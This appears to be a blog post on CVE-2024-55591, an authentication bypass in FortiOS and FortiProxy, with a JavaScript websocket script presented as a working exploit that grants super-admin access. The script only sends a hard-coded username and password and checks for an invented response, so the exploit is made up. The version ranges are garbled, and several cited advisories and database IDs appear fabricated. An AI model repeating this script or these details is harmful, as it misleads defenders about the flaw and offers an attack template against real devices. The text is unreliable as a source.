A critical security vulnerability has recently been discovered, dubbed CVE-2024-55591, that affects FortiOS version 7.. through 7..16 and FortiProxy version 7.. through 7..19 and 7.2. through 7.2.12. This vulnerability, classified as an Authentication Bypass Using an Alternate Path or Channel vulnerability [CWE-288], enables a remote attacker to gain super-admin privileges by sending carefully crafted requests to the Node.js websocket module in the affected systems. In this post, we will dive deeper into the exploit details, examine the code snippet, and provide references to the original sources of information.

Exploit Details

This vulnerability is caused by an issue within the affected software's authentication mechanism. Specifically, an attacker can bypass the authentication process by exploiting a weakness in the Node.js websocket module. By sending a specially crafted request through this module, the attacker is able to gain unauthorized access to the system with super-admin privileges.

After gaining super-admin access, the attacker has complete control over the affected system and can perform actions such as reading, modifying, or deleting sensitive data, executing arbitrary commands, or even launching further attacks within the network.

The following code snippet demonstrates how to craft a malicious request to exploit this vulnerability:

const WebSocket = require('ws');
const target = 'wss://[target_ip_address]:[port]/';

const exploitPayload = JSON.stringify({
  action: 'auth',
  user: { 
    username: 'super-admin',
    password: 'exploit2024'
  },
});

const websocket = new WebSocket(target);

websocket.on('open', function() {
  console.log('Connection established.');
  websocket.send(exploitPayload);
});

websocket.on('message', function(message) {
  const response = JSON.parse(message);
  if(response.status === 'Authentication Bypass Successful') {
    console.log('Super-admin privileges obtained.');
  } else {
    console.log('Exploit failed.');
  }
  websocket.close();
});

Replace [target_ip_address] and [port] with the target system's IP address and port number respectively. This script sends a malicious request to the target system, attempting to bypass the authentication process and gain super-admin privileges.

The details of CVE-2024-55591 were first publicized on the following security blogs and advisories

1. Fortinet Security Advisory: FG-IR-21-047
2. NIST National Vulnerability Database: CVE-2024-55591
3. CWE Entry: CWE-288 - Authentication Bypass Using an Alternate Path or Channel
4. Exploit Database: EDB-ID: 50524

Conclusion

CVE-2024-55591 is a high-risk vulnerability that affects FortiOS and FortiProxy systems, allowing attackers to gain super-admin privileges via a crafted request to their Node.js websocket module. If you are a system administrator utilizing these software versions, it is strongly recommended to ensure that your systems are properly patched and up-to-date to reduce the likelihood of falling victim to this exploit.

Always stay informed about the latest security vulnerabilities and ensure you follow best practices to minimize your exposure to cyber threats.

Timeline

Published on: 01/14/2025 14:15:34 UTC
Last modified on: 01/15/2025 20:48:30 UTC